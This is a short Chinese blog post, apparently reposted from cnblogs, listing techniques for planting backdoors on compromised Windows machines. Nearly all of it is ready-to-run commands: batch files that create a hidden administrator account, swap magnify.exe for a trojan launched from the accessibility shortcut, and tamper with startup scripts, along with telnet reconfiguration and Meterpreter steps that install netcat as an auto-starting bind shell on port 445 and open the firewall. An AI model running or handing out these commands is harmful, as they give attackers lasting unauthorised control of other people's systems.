Windows后门小计

2021-07-03 04:05

阅读:424

标签:嗅探   win   开关   sof   enable   cmd   放大   批处理   tcp   

嗅探欺骗:



在目标机上安装嗅探工具窃取管理员的密码

放大镜替换:


 

构造批处理:

  @echo off
  net user gslw$ test168 /add
  net localgroup administrators gslw$ /add
  %Windir%\system32\nagnify.exe
  exit
转换exe文件:
battoexe等工具
文件替换:
  @echo off
  copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
  copy %Windir%\system32\magnify.exe nagnify.exe
  replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
  replace.exe %Windir%\magnify.exe %Windir%\system32
  exit
后门利用:
Win+U启动辅助工具项,打开放大镜即可

组策略欺骗:



在windows开关机启动脚本中做手脚:
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit

telnet利用:



远程改端口:“tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168 ”
在目标机开启:
tlntadmn config port=2233 //修改 telnet默认端口
sc config tlntsvr start= auto //设置启动类型为自启动
net start telnet //开启telnet服务项
tlntadmn config sec =passwd //设置密码
tlntadmn config port = 800 //设置端口
远程登陆:telnet 192.168.1.9 800 //键入账号密码即可连接

msf(Netcat.exe):



上传到目标系统:meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
查看自启:meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
设置自启:meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe‘
检查确认:meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
打开cmd :meterpreter > execute -f cmd -i
开放445端口:netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
检查是配置:netsh firewall show portopening
后门使用:nc -v 172.16.104.128 445

Windows后门小计

标签:嗅探   win   开关   sof   enable   cmd   放大   批处理   tcp   

原文地址:https://www.cnblogs.com/feiyucha/p/9903588.html


评论


亲,登录后才可以留言!